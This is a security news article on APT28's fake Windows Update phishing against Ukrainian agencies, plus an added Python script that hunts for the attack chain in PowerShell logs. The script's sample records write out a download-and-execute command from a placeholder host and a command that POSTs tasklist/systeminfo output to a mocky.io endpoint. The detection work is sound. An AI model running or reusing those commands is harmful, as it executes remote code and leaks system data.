Russian Cyber Group APT28 Targets Ukraine Government with Fake Windows Update Emails

Vlad CONSTANTINESCU
The APT28 group has been spotted sending rogue emails to Ukrainian government agencies. The infamous Advanced Persistent Threat (APT) gang is running a campaign that floods its targets with deceptive messages about Windows updates in a bid to spread data-stealing malware on the compromised machines.

According to the Computer Emergency Response Team of Ukraine (CERT-UA), threat actors sent fake Windows Update emails throughout April, spoofing the email addresses of government agencies’ system administrators.

Upon further investigation, CERT-UA found malicious attachments hidden in the emails. A recipient who opened the attachments would unknowingly execute the malware on their system.

The primary goal of the APT28 campaign is to infiltrate the targeted systems, steal sensitive data, and potentially disrupt the functioning of the Ukrainian government.

“The sample letter contains ‘instructions’ in Ukrainian for ‘updates to protect against hacker attacks,’ as well as graphical images of the process of launching a command line and executing a PowerShell command,” reads CERT-UA’s security advisory. “The mentioned command will download a PowerShell script that, simulating the process of updating the operating system, will download and execute the following PowerShell script designed to collect basic information about the computer using the ‘tasklist,’ ‘systeminfo’ commands, and send the received results using HTTP request to the Mocky service API.”
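The advisory quoted above describes a three-stage PowerShell chain: a command that downloads a script which fakes an OS update, a second script that runs tasklist and systeminfo, and an HTTP request that posts the results to the Mocky API. The following is an added example of how a defender might hunt for that chain in PowerShell Script Block Logging (Event ID 4104) data; it is not code from the article or from CERT-UA. The indicator patterns, the sample log records, the host and user names, the placeholder URLs and the assumption that the Mocky API is served under the mocky.io domain are all mine.

```python
import re
from collections import defaultdict

# Indicator patterns for the stages CERT-UA describes: a PowerShell download
# cradle that fakes an OS update, host recon with tasklist/systeminfo, and an
# HTTP POST of the results to the Mocky service API. The patterns are my own
# and are deliberately broad; a single hit is expected in normal admin activity.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b",
        re.I,
    ),
    "invoke_expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
    # A progress bar whose text mentions an update is the "simulated OS update" lure.
    "fake_update_lure": re.compile(r"Write-Progress[^\n]*\bupdat", re.I),
    "host_recon": re.compile(r"\b(tasklist|systeminfo)\b", re.I),
    "exfil_http_post": re.compile(r"-Method\s+Post\b|\bUpload(String|Data|File)\b", re.I),
    # Assumption: the Mocky API the advisory mentions is served under mocky.io.
    "mocky_api_host": re.compile(r"\bmocky\.io\b", re.I),
}

# Constructed sample records in the shape of Script Block Logging (Event ID 4104)
# entries. Hosts, users and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "admin",
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"host": "ws-01", "user": "admin",
     "script": "systeminfo | Out-File C:\\inventory\\ws-01.txt"},
    {"host": "ws-07", "user": "clerk",
     "script": "Write-Progress -Activity 'Windows Update' -Status 'Installing update 3 of 7'; "
               "$s = (New-Object Net.WebClient).DownloadString('https://stage2.example.invalid/update.ps1'); "
               "Invoke-Expression $s"},
    {"host": "ws-07", "user": "clerk",
     "script": "$info = (tasklist) + (systeminfo) | Out-String; "
               "Invoke-RestMethod -Uri 'https://run.mocky.io/v3/PLACEHOLDER-ID' -Method Post -Body $info"},
]


def match_indicators(script: str) -> list:
    """Return the names of every indicator pattern that matches the script text."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def triage(events, threshold: int = 2) -> list:
    """One verdict per event; flagged only when `threshold` or more indicators co-occur.

    Requiring co-occurrence keeps an admin running systeminfo on its own out of the alerts.
    """
    verdicts = []
    for ev in events:
        hits = match_indicators(ev["script"])
        verdicts.append({
            "host": ev["host"],
            "user": ev["user"],
            "indicators": hits,
            "flagged": len(hits) >= threshold,
        })
    return verdicts


# The minimum set of stages that makes up the full chain from the advisory.
CHAIN = {"download_cradle", "host_recon", "exfil_http_post"}


def hosts_with_full_chain(events) -> list:
    """Hosts on which, across all their script blocks, every stage of the chain was seen."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(match_indicators(ev["script"]))
    return sorted(host for host, inds in seen.items() if CHAIN <= inds)


if __name__ == "__main__":
    for verdict in triage(SAMPLE_EVENTS):
        mark = "ALERT" if verdict["flagged"] else "ok   "
        print(f"{mark} {verdict['host']:6} {verdict['user']:6} {', '.join(verdict['indicators']) or '-'}")
    print("full chain seen on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Per-event scoring catches each stage as it runs; the per-host correlation in `hosts_with_full_chain` is what distinguishes a single noisy download from the complete download-recon-exfiltrate sequence, and a real deployment would bound that correlation to a time window and feed it alongside the sender-spoofing evidence from the original emails.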

APT28, also known as Sofacy, Strontium and Fancy Bear, is believed to have strong ties to the Kremlin. These connections suggest the Kremlin may support or even direct their cyber-espionage activities, further complicating the geopolitical landscape.

The current campaign is not a standalone event in the struggle between Russia and Ukraine. There have been multiple instances of cyber warfare involving both sides.

One notable recent event involved an anonymous hacker who managed to steal cryptocurrency from wallets owned by Russian agencies. The stolen funds were then redirected to Ukrainian aid wallets, providing financial support to the country amidst the prolonged war.

These occurrences emphasize how cyber warfare is becoming a vital component of international disputes, where government-backed operatives and individual hackers contribute significantly to such conflicts.


Specialized software like Bitdefender Ultimate Security can protect you from rogue emails and other cyber threats with its comprehensive list of features, including:

  • 24-7, all-around monitoring and protection against worms, viruses, Trojans, rootkits, zero-day exploits, spyware, ransomware, and other e-threats
  • Antispam module that filters irrelevant messages in your local email clients’ inbox
  • Behavioral detection technology that closely monitors active apps and takes instant action upon detecting suspicious activity
  • Network threat prevention module that identifies and blocks suspicious network-level activities, including botnet-related URLs, brute-force attacks, and sophisticated exploits

Author


Vlad CONSTANTINESCU

Vlad's love for technology and writing created rich soil for his interest in cybersecurity to sprout into a full-on passion. Before becoming a Security Analyst, he covered tech and security topics.
